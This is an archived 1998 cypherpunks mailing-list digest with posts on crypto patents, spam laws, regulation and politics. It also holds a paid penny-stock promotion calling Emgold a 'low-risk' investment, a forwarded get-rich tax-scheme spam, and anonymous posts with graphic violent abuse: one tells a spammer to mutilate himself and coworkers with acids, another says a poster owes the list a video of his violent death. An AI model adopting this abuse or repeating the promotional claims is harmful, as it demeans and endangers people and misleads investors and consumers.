a second shaft, it may be possible to increase production 
to 5,000 ST/day - at this production level, the Idaho-Maryland 
mine would produce over 200,000 ounces of gold per year 
(on par with other major mines).

Recent studies indicate that the Idaho-Maryland mine could 
be profitably developed and operated at a long-term gold 
price of US$300/oz based on an estimated operating cost 
(excluding capital and royalties) of US$215 per ounce.  


Current Market Conditions

The current gold rally is gaining strength with each 
passing day!

In the past month, bullion prices have risen nearly 10%.  
Yesterday, the Philadelphia XAU gold and silver index 
closed at 74.69, up 53% from its record low of 48.67 
set in late August.
Mining stocks have regained favor with major Wall 
Street firms:  Merrill Lynch has initiated coverage of 
Placer Dome, Barrick, TVX and Kinross, while Bear Stearns 
has upgraded the recommendations of Asarco, Cyprus Amax 
and Phelps Dodge.

To a large extent, the market rebound has largely 
benefited the major mining companies, whose share 
prices are now fully-valued (or even
over-valued) at current gold prices.  However, we 
believe that, as the current rally continues, investors 
will increasingly seek out undervalued junior exploration 
and development companies with multi-million ounce gold deposits.


Opportunity for Investors

Trading at a tremendous discount to its fair market value, 
EMGOLD offers investors a low-risk investment opportunity 
in the current market environment, and a chance to accumulate 
a significant position in a stock that can be expected to 
rally strongly as gold prices move above US$300 / oz. 

With just 11.5 million shares outstanding (14 million 
fully-diluted) 
and a current share price of Cdn$0.28, the equity markets are 
valuing the Idaho-Maryland gold mine at just Cdn$1.06 per 
ounce of gold (Cdn$1.35 / oz Au on a fully-diluted basis).  


EMGOLD's  Idaho-Maryland mine offers one of the best advanced 
exploration / developmental prospects available in North America. 
 
With inferred resources of almost three million ounces, 
nearly one hundred years of operating history, an existing 
3,400-foot, three-compartment  shaft and 70+ miles of 
underground workings, EMGOLD has 100% control of a world-class 
gold project with the vast majority of the expensive 
infrastructure in place and ready to go.


For more information, please contact Andrew Hunter
toll-free at 1 - 888 - 267 - 1400



Disclaimer: The information contained herein has been 
compiled or derived from sources believed reliable and 
contains information and opinions which are accurate 
and complete.  However, Gold Ridge makes no representation 
or warranty, express or implied, in respect thereof, 
takes no responsibility for any errors and omissions 
which may be contained herein and accepts no liability 
whatsoever for any loss arising from any use or reliance 
upon this report or its contents.  The information provided 
is for information purposes only and should not be construed 
as, and shall not form part of an offer or solicitation to 
but or sell any securities.  Emgold Mining has
paid Gold Ridge a fee of US$20,000.00 for preparing and 
disseminating this information.


--------------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN">

<HEAD>

<META content=text/html;charset=iso-8859-1 
http-equiv=Content-Type>
<META content='"MSHTML 4.72.3110.7"' name=GENERATOR>
</HEAD>

<DIV>
<DIV>GOLD RIDGE INVESTMENT CORP. ANNOUNCES:


GOLD MARKET RECOVERY 
GAINING STRENGTH - INVESTORS SHIFTING ATTENTION TO 
UNDERVALUED COMPANIES WITH 
WORLD-CLASS GOLD DEPOSITS 

EMGOLD MINING'S 100%-OWNED IDAHO-MARYLAND 
PROJECT HOSTS 2.97 MILLION OUNCE RESOURCE - TO BE DEVELOPED @ 
140,000 oz/yr @ 
US$215 / oz Au


EMGOLD MINING CORPORATION (&quot;EMR&quot; - 
VSE)
1610 - 777 Dunsmuir Street, P. O. Box 10435
Vancouver, BC&nbsp; V7Y 
1K4&nbsp; Canada
Phone: (604) 687 - 4622&nbsp;&nbsp;&nbsp; Fax: (604) 687 - 
4212
Toll-Free:&nbsp; (888) 267 - 1400
website:&nbsp; http://www.emgold.com


Introduction</DIV>
<DIV>
EMGOLD MINING CORP. has made significant progress in bringing the 
historic Idaho-Maryland gold mine to a production decision.&nbsp; 
Recent 
engineering studies indicate that less than half of the known 
gold has been 
extracted from the deposit, and that a 3,000,000 ounce resource 
remains to be 
mined.


History &amp; Past Production</DIV>
<DIV>
The Idaho-Maryland gold mine was discovered in 1851, and was 
in
nearly-continuous production from 1862 through 1956.&nbsp; Total 
recorded 
production from the mine was 2,383,000 ounces of gold from 
5,546,000 tons of ore 
(0.43 oz/ton recovered grade).&nbsp; When the mine closed in 1956 
due to 
escalating costs and the fixed price of gold of US$35/oz, mining 
operations were 
underway on 25 different faces on 6 different levels.


Large 
Mineralized System Defined - Extensive Infrastructure In Place
The 
Idaho-Maryland vein system is 9,000 feet long, up to 3,000 feet 
wide, and has 
been partially-mined from surface to the 2000 foot level.&nbsp; 
Access to the 
mine's 15 working levels is provided by the three-compartment, 
3,460-foot deep 
New Brunswick Shaft.&nbsp; Over 70 miles of underground tunnels 
and workings 
provide access to much of the property.


A Three Million Ounce Gold 
Resource Has Been Defined&hellip;.
A 1992 study by James Askew and Associates 
Inc. estimated that the
remaining gold resources and potential mineralization 
between the 2000 and 3280 levels of the Idaho-Maryland mine are 
9,117,500 ST @ 
0.326 oz Au/ST (containing 2,968,400 oz Au).&nbsp; This resource 
estimate 
excludes the potential for large, bulk tonnage targets identified 
by EMGOLD in 
1997.&nbsp; 


Upside Potential:&nbsp; 3,000,000+ oz Au</DIV>
<DIV>
Located within the wedge-shaped confines of three bounding 
faults, a 
3-D geologic model developed for the Idaho-Maryland mine 
demonstrates the 
potential for continuity of the existing vein system to a 
vertical depth of 
5,000 feet (the Idaho-Maryland mine is essentially unexplored 
below a depth of 
3,280 feet).

What is not widely known is that the adjoining Empire mine 
produced six million ounces of gold to a depth of 5,200 
feet!&nbsp; This fact, 
combined with the knowledge that all mineralized structures 
developed on the 
lowest levels of the Idaho-Maryland mine remain open at depth, 
supports EMGOLD's 
belief that considerably more ore may exist at depth.


Development 
Program (1998 - 1999)</DIV>
<DIV>
EMGOLD's plans for reviving the Idaho-Maryland mine are to first 
de-water the mine, and then go underground to do further 
exploration to prove up 
the total resource potential.&nbsp;&nbsp; EMGOLD has applied for 
and been 
granted all permits necessary for re-opening the New Brunswick 
shaft, 
de-watering the mine and completing a bankable feasibility.


Potential 
Gold Production of at Least 140,000 oz / yr @ US$215 / oz Au 
EMGOLD plans to 
resume operations at the Idaho-Maryland mine at an initial mining 
rate of 1,500 
ST ore / day, which would produce approximately 140,000 ounces of 
gold per 
year.&nbsp; With the addition of a second shaft, it may be 
possible to increase 
production to 5,000 ST/day - at this production level, the 
Idaho-Maryland mine 
would produce over 200,000 ounces of gold per year (on par with 
other major 
mines).

Recent studies indicate that the Idaho-Maryland mine could be 
profitably developed and operated at a long-term gold price of 
US$300/oz based 
on an estimated operating cost (excluding capital and royalties) 
of US$215 per 
ounce.&nbsp; 


Current Market Conditions</DIV>
<DIV>
The current gold rally is gaining strength with each passing 
day!

In the past month, bullion prices have risen nearly 10%.&nbsp; 
Yesterday, the Philadelphia XAU gold and silver index closed at 
74.69, up 53% 
from its record low of 48.67 set in late August.

Mining stocks have 
regained favor with major Wall Street firms:&nbsp; Merrill Lynch 
has initiated 
coverage of Placer Dome, Barrick, TVX and Kinross, while Bear 
Stearns has 
upgraded the recommendations of Asarco, Cyprus Amax and Phelps 
Dodge.

To 
a large extent, the market rebound has largely benefited the 
major
mining 
companies, whose share prices are now fully-valued (or even
over-valued) at 
current gold prices.&nbsp; However, we believe that, as the
current rally 
continues, investors will increasingly seek out undervalued 
junior exploration 
and development companies with multi-million ounce gold 
deposits.


Opportunity for Investors</DIV>
<DIV>
Trading at a tremendous discount to its fair market value, EMGOLD 
offers investors a low-risk investment opportunity in the current 
market
environment, and a chance to accumulate a significant position in 
a 
stock that can be expected to rally strongly as gold prices move 
above US$300 / 
oz. 

With just 11.5 million shares outstanding (14 million 
fully-diluted) 
and a
current share price of Cdn$0.28, the equity markets are valuing 
the
Idaho-Maryland gold mine at just Cdn$1.06 per ounce of gold 
(Cdn$1.35 / 
oz Au on a fully-diluted basis).&nbsp; 


EMGOLD's&nbsp; Idaho-Maryland 
mine offers one of the best advanced exploration / developmental 
prospects 
available in North America.&nbsp; With inferred resources of 
almost three 
million ounces, nearly one hundred years of operating history, an 
existing 
3,400-foot, three-compartment&nbsp; shaft and 70+ miles of 
underground workings, 
EMGOLD has 100% control of a world-class gold project with the 
vast majority of 
the expensive infrastructure in place and ready to go.


For more 
information, please contact Andrew Hunter
toll-free at 1 - 888 - 267 - 1400



Disclaimer: The information contained herein has been 
compiled or derived from sources believed reliable and contains 
information and 
opinions which are accurate and complete.&nbsp; However, Gold 
Ridge makes no 
representation or warranty, express or implied, in respect 
thereof, takes no 
responsibility for any errors and omissions which may be 
contained herein and 
accepts no liability whatsoever for any loss arising from any use 
or reliance 
upon this report or its contents.&nbsp; The information provided 
is for 
information purposes only and should not be construed as, and 
shall not form 
part of an
offer or solicitation to but or sell any securities.&nbsp; Emgold 
Mining has
paid Gold Ridge a fee of US$20,000.00 for preparing and 
disseminating this information.
</DIV></DIV>


NOTE: For those on the internet who do not want to recieve 
exciting messages 
such as this.....
* To be removed from our mailing list, simple send 
"remove" to the return address.

*We strive to comply with all state and federal laws and 
to send ads only to interested parties.

*This ad is not intended for nor do we knowingly 
send to Washington State residents. 



PRINT THIS AD FOR FUTURE CONSIDERATION!!


 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jack Oswald / CEO / RPK Security" <Announcements_reply@rpkusa.com>
Date: Wed, 30 Sep 1998 23:22:01 -0700 (PDT)
Subject: ANNOUNCEMENT: RPK SECURITY AWARDED PATENTS FOR ENCRYPTONITE ENGINE IN U.S. AND NEW ZEALAND
Message-ID: <199810010614.XAA03563@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


You have received this message because at some time in the past your name was submitted to our e-mail mailing list database.  If you do not wish (or no longer wish) to receive announcements, updates and news concerning the RPK Encryptonite Engine or the RPK InvisiMail e-mail security products, please forward this message to remove@rpkusa.com

-----------------------------------------------------------------------

MEDIA ALERT

CONTACT
Paula Miller						Lyn Oswald
Nadel Phelan, Inc.					RPK Security Inc.
408-439-5570 x277					212-488-9891
paulam@nadelphelan.com				lynoswald@rpkusa.com	


RPK SECURITY AWARDED PATENTS FOR ENCRYPTONITE ENGINE IN U.S. AND NEW ZEALAND

SAN FRANCISCO, CA. September 15, 1998 - RPK Security, Inc., a technology leader in fast public key encryption, today announced that the technology behind the company's uniquely fast public key cryptosystem, the RPK Encryptonite Engine, was awarded U.S. patent number 5,799,088 on August 25, 1998 and New Zealand patent number 277,128 on August 17, 1998.
 
Based on the proven mathematics of Diffie-Hellman Key Exchange, the RPK Encryptonite Engine combines all the benefits of other public key systems (authentication, digital signatures and digital certificates) with the speed of a secret key system into one algorithm. With the superior performance offered by RPK's Encryptonite Engine, applications requiring streaming data, sound, video or large numbers of transactions, such as credit card payments, receive instantaneous responses and secure communication links.

"We believe these patents give us a significant, unique and enforceable competitive advantage over other providers of public key encryption products," said Jack Oswald, president and CEO of RPK Security. "The RPK patents confirm our technology leadership in strong and fast public key cryptography."

With development and distribution facilities outside of the U.S., RPK Security is able to provide its customers with a worldwide strong encryption solution that is available globally, unlike competing products that are restricted by U.S. export regulations. 

ABOUT RPK SECURITY
Founded in 1995, RPK Security, Inc. is a technology leader in fast public key cryptography.  Its flagship RPK Encryptonite(tm) Engine, a uniquely fast and strong public key encryption technology, is available worldwide in custom hardware and software toolkits on multiple platforms.  Developed from widely accepted security mathematics and techniques, the RPK Encryptonite Engine is easily embedded into new and existing hardware and software applications.  RPK's cryptographic research and product development is based in New Zealand, Switzerland and the U.K, with worldwide sales and marketing operations in San Francisco, CA.  Visit RPK's website at www.rpkusa.com or call (212) 488-9891.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Wed, 30 Sep 1998 16:57:32 -0700 (PDT)
To: Undisclosed.recipients@hun.org
Subject: Re: IP: The virtual president
Message-ID: <199809302356.XAA01559@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 29 Sep 1998, Lazlo Toth wrote:

>"Someone else," aka "Flagship" == "The People"?
>
>-Lazlo
>
    no, Lazlo...  don't be naive; "The People" dont have any say.

    "Someone else," aka "Flagship" == "Geo. Bush"

    I said (documented) in 1986 during Reagan's presidency:

	Geo. Bush will be the last American President to 
	complete his elected term of office.

    Geo. Bush had not yet been elected President...

	attila out...     	(Arkancide?)


    ~~~	absolutely incredible article; a perfect description and
	analysis of our Virtual President, Bill "Bubba" Clinton.
	and, hopefully he takes the Virtual Agenda Hillary with
	him.

	Missy Kelly deserves at least a Pulitzer prize for this one!
	and Joseph Farah, publisher of World News Daily, shows that 
	he has what it takes to lead the fourth estate.

	    attila out...   	(for real)

>
>
>At 5:21 PM -0700 9/28/98, you wrote:
>>From: Jean Staffen <jstaffen@flash.net>
>>Subject: IP: The virtual president
>>Date: Fri, 25 Sep 1998 22:22:11 -0500 (CDT)
>>To: ignition-point@majordomo.pobox.com
>>
>>This is the most INCREDIBLE article.  I never thought I'd read something
>>like this in the mainstream media!!! -Jean
>>
>>
>>                   The virtual president=20
>>                 =20
>>
>>                   By Missy Kelly=20
>>                   Copyright 1998, WorldNetDaily.com=20
>>
>>                   "You know, by the time you become the leader of a
>>                   country, someone else makes all the decisions." -- Bill
>>                   Clinton September 4, 1998=20
>[snip]
>

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Louis Archambault <atomic@odyssee.net>
Date: Sat, 12 Sep 1998 14:21:09 -0700 (PDT)
To: cypherpunks-announce@toad.com
Subject: Re: ANNOUNCE: Bay Area Cypherpunks, Sat. Sept. 12, 12-6, KPMG  Mountain View
In-Reply-To: <3.0.5.32.19980910170625.00cd8ec0@idiom.com>
Message-ID: <3.0.3.32.19980912172144.02cf4948@10.0.0.1>
MIME-Version: 1.0
Content-Type: text/plain


unsubscribe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Denver Liu <denverl@public.szonline.net>
Date: Sat, 12 Sep 1998 05:13:26 -0700 (PDT)
To: "cypherpunks-announce@toad.com>
Subject: unsubscribe
Message-ID: <199809121213.UAA10491@public.szonline.net>
MIME-Version: 1.0
Content-Type: text/plain


unsubscribe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 15 Aug 1998 02:21:03 +0800
To: cypherpunks@cyberpass.net
Subject: another RSA tattoo
Message-ID: <199810141813.TAA30344@server.eternity.org>
MIME-Version: 1.0
Content-Type: text




Cancer Omega <comega@sekurity.org> sent me a nice RSA in perl tattoo
he has had done on the left of his chest.

See:

	http://www.dcs.ex.ac.uk/~aba/rsa/tattoo2.html

(and for the other tattoo see:

	http://www.dcs.ex.ac.uk/~aba/rsa/

)

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 1 Oct 1998 02:32:45 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A1928471D@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> > Lightly? You jest.
> 
> No I don't. I can start a business for as little as $15 to 
> register a DBA and I don't need licenses or other sorts of 
> regulatory permissions.

And you would be stupid to expose yourself to full liability.

Regulation includes much more than licensing and registration. Try
hiring a couple employees, paying freelance individuals, setup office
space, get yourself a company car and do your fed income taxes. Lightly
regulated my ass. If they enforced every word of every code strongly and
literally it would be nearly impossible to conduct business.

> No we shouldn't. The fact that monopolies can exist in this 
> lightly regulated economy is ample evidence

Bullshit, monopolies exist because of the regulation.
 
> If you seriously think this is a heavily regulated market you 
> should do more research into such places as Nazi Germany, 
> Russia, China, etc.

Bullshit again, there is a *big* difference between a regulated market
(mixed capitalist/socialist economy) and a command economy. So because
we don't live in Soviet Russia we should all bend over and take it?

> Monopolies are monopolies, claiming that they will be less 
> abusive in a regulated market than in a free-market just 

Coercive power takes form via regulation. Without it a bad monopoly is a
short-lived one.

> You are claiming that if we do away with the food 
> regulations that McDonalds will be *more* concerned 
> about their meat being cooked thoroughly then you

Liability, liability, liability. Regulation often promotes bad practice
as businesses comply with minimum regulation and nothing more instead of
thinking for themselves. What is worse is government often shields
companies from liability.

> If a market monopolizes there is *NO* competition.

How do you prevent potential competition? Monopoly means both the
absence of existing and potential competition and alternatives.

> If the market is one that takes a large investment in 
> intellectual or capital materials then there
> won't be any opportunity to even attempt to start a 
> competitive venture.

A fluid capital market can finance even the largest of ventures if the
potential return is there. Different markets have different time
schedules, but competition can and will come.

Intellectual Property enforcement is an act of government, it is a force
monopoly, only just and reasonable IP laws limit it. Notice that, bad
laws = bad monopoly, good laws = balanced environment, no laws = no
monopoly. The last of which is not necessarily preferable in this case,
and is a fundamental difference in laissez-faire Vs anarchy.

> Fairness is about the consumer, not the manufacturer.

You have an odd definition of fair. You cannot have fair for the benefit
of one at the expense of another.

> Contractual with who?

With whomever is a part of the framework.

> > reputation for punishment instead of life and liberty, 
> 
> Businesses are neither alive nor do they enjoy liberty. Don't 
> confuse people with systems and objects.

No, do not strip the person from the businesses. A group of people do
not lose any of the rights and liberty of a single individual, neither
do they gain any. Businesses are people.

Commerce is a fundamental right, in order to survive you must be able to
create and dispose of that creation. The lack of the *individual's*
right to freely and easily pursue any and all business pursuits to any
degree is an act of enslavement of the individual to corporate
aristocracy and bureaucratic whim.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 1 Oct 1998 03:28:37 +0800
To: Tim May <business_ideas@usa.net
Subject: Re: New California Spam Law is Bullshit
In-Reply-To: <Pine.LNX.4.02.9809301837420.23648-100000@khercs.chipware.net>
Message-ID: <3.0.5.32.19981001011605.00821e50@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:06 PM 9/30/98 -0700, Tim May wrote:
>Think twice before citing this new law....
>Whatever one thinks about unsolicited e-mail, the provisions of this new
>California bill are frightening to any supporter of liberty.

Yeah - they aren't totally evil bills, in the sense that one shouldn't
ascribe to malice that which can be adequately explained by stupidity,
but they're both pretty bad, as well as vague and unclear.
On the other hand, if you're not willing to go to Sacramento to help
them make sausages, the way the anti-spammers are, it's harder to
justify bitching about the quality of sausage they're shoving down your throat.

>* and where does the "must have a toll-free number" bullshit come from?
>Think about it. It may sound _nice_ to demand that people have toll-free
>numbers, but where is the constitutional support for such a taking?

More precisely, Bowen's bad bill requires you to establish either a
toll-free number or sender-operated email address, and include on your
unsolicited commercial fax or email the toll-free number or an address 
to which the recipient can write or email.  Less precisely, it doesn't
say that the number has to be toll-free IN CALIFORNIA, or that you have to
answer calls to the phone number.

Both bills have serious problems with banning anonymity, and with clearly 
identifying when they apply, given the combinations of recipient, sender, 
recipient's ISP, recipient's email mailbox, sender's ISP, telecom provider, 
and probably other physical and corporate entities that can either be
inside or outside California - or both - with or without knowledge of the
sender, and with asserting jurisdiction over non-California-based senders,
and asserting that jurisdiction based on factors the sender may not know.

And then there's the lovely definition of "published" in one of the bills -
it applies if you violate the ISP's published anti-spamming policy.
They're (correctly) not required to _have_ an anti-spamming policy,
but if they have one, you're required to obey it if it's published,
either by putting it on their web page (pointed to from their home page),
or "available by mail for free on request".  Of course, if they don't
*have* a policy, they're under no obligation to send you a timely
printed version by snail-mail, so even leaving out the undue burden
of determining who a recipient's email provider and ISP are,
and determining whether they have an anti-spamming policy,
and what if means, you can't safely send your fine commercial
solicitation to lucky recipients whose ISPs *don't* have an 
anti-spam policy on their web page, because it might only be on paper.

On the other hand, you can send your spam from a spamhaus,
and if I read the bill correctly, the spamhaus is safe,
and probably the sender is also, especially if they're both
outside of California.  So it's not much protection against spammers.
(The language about policies of the recipient's ISP is vaguer,
and has more risk of legal weakness because there's no
legal contract between the sender and the recipient's ISP.)

Then of course, who really _sent_ the mail?  An anonymous user
of a spamhaus?  (That bad, bad person!)  What if he paid digicash,
or walked in and paid cash for an account?  What if it's not "he",
but "it", a corporation that got set up for $50, used for spamming,
and then obeys the laws by never spamming any complainers again, 
though its owners can start a new corporation the next day and burn it too,
perhaps even starting it off by selling it the list of complainers...




				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Wed, 30 Sep 1998 22:16:48 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Increase Your Paycheck Next Week
Message-ID: <df3b491a84d53c0ce7e0e59b39c1951a@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Hello, asshole:

I'd just like to suggest that you fuck yourself with a large metal hook in
all bodily cavities. As you are bleeding out, pour 12M nitric acid in your
wounds and feel the burn. If you are still conscious, superglue your little 
finger in a centrifuge and turn it on at maximum speed. If you are still
conscious, stick your head into a liquid nitrogen bath. All your coworkers
should repeat this procedure.

As an alternative, you can tie any coworkers you have up and bathe them in 
concentrated nitric acid while you shower them in NH4OH. Place your penis in
liquid nitrogen and then attempt to jack off. Finally, drink a concentrated
hydrochloric acid solution followed by concentrated sodium hydroxide
solution. In the unlikely event that you are able to do so, scream 'I AM THE
MASTER OF THE UNIVERSE!' over and over again while dancing until you pass out.

I wave to Interpol.

Hey Louis! What's shaking?

-------------------------------------------------------------------------------
Forwarded spam:
-------------------------------------------------------------------------------

Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id MAA01379
	for cypherpunks-outgoing; Wed, 30 Sep 1998 12:03:54 -0400 (EDT)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id MAA01367
	for <cypherpunks@algebra.com>; Wed, 30 Sep 1998 12:03:48 -0400 (EDT)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.8.8) id JAA20785; Wed, 30 Sep 1998 09:07:02 -0700 (PDT)
Received: from cyberpass.net (cyberpass.net [209.75.197.3]) by sirius.infonex.com (8.8.8/8.8.8) with ESMTP id JAA20767 for <cpunks@sirius.infonex.com>; Wed, 30 Sep 1998 09:06:56 -0700 (PDT)
Received: from 152.202.71.131 (202-71-131.ipt.aol.com [152.202.71.131]) by cyberpass.net (8.8.8/8.7.3) with SMTP id JAA07148 for <cypherpunks@cyberpass.net>; Wed, 30 Sep 1998 09:08:07 -0700 (PDT)
Date: Wed, 30 Sep 1998 09:08:07 -0700 (PDT)
From: 2001files@usa.net
Message-Id: <199809301608.JAA07148@cyberpass.net>
To: cypherpunks@cyberpass.net
Reply-To: business_ideas@usa.net
Subject: Increase Your Paycheck Next Week
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Status: RO
X-Status: 


Would you like to get a pay raise next week without asking your boss?   Then this very special report, "Money Power," is for you!

If you have a regular job - not working in your own or a family business - and you get a regular paycheck, we can show you how you can give yourself a HUGE RAISE in your very next paycheck.  At least between 20% - 30% more than what you are getting now.  Yes, your paycheck will be increased substantially!

	* Example:  If your take home pay is $400 net per week, you can take home $440 - $500 the very next week and every week thereafter!

No Gimmicks!  Everything is perfectly legal.

"Money Power" is written in three parts:

	*Part I - shows you exactly what to do so you can give yourself a raise in your next paycheck.  You decide how big a pay raise you want to give yourself!

	*Part II -  shows you how to protect yourself, your family, your home, and your assets without paying big money -- just $85 per year to legally protect your liability 100% against bill collectors and debts.

	*Part III - shows you how you can legally deduct household expenses - utilities, gardener, supplies, repairs, and more from your income taxes.  Absolutely No Gimmicks!  Everything is legal.

This is NOT a "get rich quick" scheme or some other scam.  We are sure you have seen lots of them.  And this is NOT a "tax protester" who refuses to pay income taxes.  The author of this report pays taxes every year - of course, as little as legally possible.  It's our opinion it is not good to zero out completely.  But, you can - it's your choice.

Using the methods in this report, the rich become richer.  And poor people become poorer when they don't take advantage of these techniques.  Your chances of being audited by the IRS - just for using these methods - are near zero.

	* We are so sure "Money Power" will work for you, here is our risk-free guarantee.  If you don't get at least 100 times more money in your paycheck in one year than the cost of this report, we will double your money back!  How's that for a guarantee?
                      ---------------------------------

Now, here's one more offer you will find hard to refuse.  We have a Reseller Program whereby you can make money selling this report.  When you purchase "Money Power," you will also get 1,000 FREE places to advertise on the Internet!  If you want to make some extra money - $500, $1,000 or more - just post ads on those sites and have the orders come to you.  For every order you send us, we will pay you $5.00:
	*You don't need a merchant account to process orders!  We do that.
	*You don't have to warehouse any inventory!  We do that.
	*You don't have to ship any merchandise.  We do that.
All you have to do is send us the orders.  We'll process checks, money orders, and credit cards and we will pack and mail the report.  And you get paid twice a month - on the 15th and the 30th!
                     ------------------------------------



And, listen.  America is a free country.  If you don't want an increase in your paycheck, that's fine.  And if you don't want to know how to protect your family, that's OK, too.  And if you don't want to save money on taxes, that's quite all right.  You are living in a free country.

But, if you need money - more money in your paycheck, act right now!  

The author of this report used to work for Corporate America earning over $100,000 a year.  After paying almost 40% in Federal taxes, 6.2% for Social Security, 1.45% for Medicare, 1.5% for the unemployment fund, and 3% for his employee benefits, he would bring home less than half of his yearly salary!  And then there was state income tax to pay!   He decided he had to do something so he could keep all the money!

"Money Power" is the result of the author's frustration and aggravation with the system and the research he did to change his situation.  These are methods they don't teach you in school!

It can't get much better than this.  This is a once in a lifetime opportunity because you may not receive this message again.  And you know how it is with opportunities ..... if you pass on one, you are not entitled to another for a long time.


Don't Delay!  The longer you wait to order, the longer you will wait for your raise!!!!


	>>>>>>>>>>>>> Please Note:  This report is for U.S. Citizens and Green Card holders only!  This program will not work for illegal immigrants or foreigners.<<<<<<<<<<<<

---------------------------------------------------------------------------

Here's how to order:

*****To order online, click on your reply button and type ORDER ONLINE in the subject line and we will e-mail you the online order form.

                             OR

Print out the convenient order form below NOW and mail it to:

	World Net Press
	Dept. EN-930
	P.O. Box 96594
	Las Vegas, NV 89193-6594
	
Payment Method:  
_____ Check     
_____ Money Order
_____ Visa
_____ MasterCard
_____ American Express
_____ Discover

_____ Yes, I want to order my copy of  "Money Power".  Price is $9.95 + $3.95 S/H = $13.90 and my order will be shipped by 1st Class Mail.   

Name_________________________________________________________________________

Address______________________________________________________________________

City/State/Zip_______________________________________________________________

Daytime Phone (__________)___________________________________________________

E-Mail Address_______________________________________________________________

Credit Card #_____________________________________________ Exp. Date_________

Cardholder Name (as it appears on the card)__________________________________

(Please make sure you include your phone number and e-mail address in case we have a question about your order.  Your credit card billing will reflect Road to Wealth, Inc.)



**************************************************************************
We are currently consolidating our mailing lists and need to update our database.  Our records indicate you may have inquired in the past. If this message has reached you in error, or the information is not correct, please accept our apology.  Follow the instructions below to be removed and we will honor your request.  We do not knowingly engage in spam of any kind.

Please click on your reply button and type REMOVE in the subject line only.  The software reads only the subject line, not the body of the message.
**************************************************************************

Please be advised we collect the e-mail addresses of all flamers, hackers, and users of abusive and vulgar language.  We submit these addresses to the FBI and Interpol on a monthly basis.  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Wed, 30 Sep 1998 21:19:06 +0800
To: Andreas.Poliza@golive.com
Subject: GoLive CyberStudio Trial Activation Key
Message-ID: <0c2e486375808b629a76c933d0374163@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Dear Maria,

Thank you for trying out CumFast VibrationDildo.

Your official 30-day orgasm key is: ISPAMTHEWORLDFORSEX

You'll need to enter this key when you first start-up the vibrator.

If you have questions about where to put the Tryout vibrator,
CumFast's knowledgeable Hands-On Demonstration staff is available to assist
you in achieving orgasm. We suggest you first check the Hands-On Support
section of our Web site www.cumfast.com. If you don't find your answers
there, please send us a naked picture of yourself in suggestive poses at
LWRules@Bellatlantic.net or call 1-800-1-FUCK-ME

When you are ready to purchase CumFast VibrationDildo or if you want to know
more about why CumFast VibrationDildo is the best product for achieving
orgasm in public, please return to our Web site or contact me at
1-800-1-FUCK-ME or 1-212-I'LL-BLOW.

Sincerely,

Monique Tops
Vibration Coordinator
CumFast Sex Toys, Inc.
LWRules@bellatlantic.net


On Wed, 30 Sep 1998 support@golive.com wrote:

>
> Dear Fritzie,
>
> Thank you for trying out GoLive CyberStudio.
>
> Your official 30-day activation key is: MWT4QWF7F8WP7GJJ
>
> You'll need to enter this key when you first start-up the
> software.
>
> If you have questions about how to use the Tryout software,
> GoLive's knowledgeable Technical Support staff is available
> to assist you. We suggest you first check the Technical
> Support section of our Web site www.golive.com. If you don't
> find your answers there, please send us an email at
> support@golive.com or call 1-800-554-6638.
>
> When you are ready to purchase GoLive CyberStudio or if you
> want to know more about why GoLive CyberStudio is the best
> product for Web site design, please return to our Web site
> or contact me at 1-800-554-6638 or 1-650-463-1580.
>
> Sincerely,
>
> Maria Jeronimo
> Operations Coordinator
> GoLive Systems, Inc.
> customercare@golive.com
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Wed, 30 Sep 1998 21:29:21 +0800
To: cypherpunks@Algebra.COM
Subject: What is AOL
Message-ID: <f0f0f1a4d9ae8ebedfc596ccea9bfddd@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Twenty1CC@aol.com had these pearls of wisdom:

>Found in rec.homor.funny.reruns

Yes, you are quite a rerun, but you aren't funny.

To answer your question, AOL is a haven for crackers, lamers, losers,
fakers, and posers like yourself.

You owe the Cypherpunks a video of your very violent and graphic death.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 30 Sep 1998 19:59:42 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
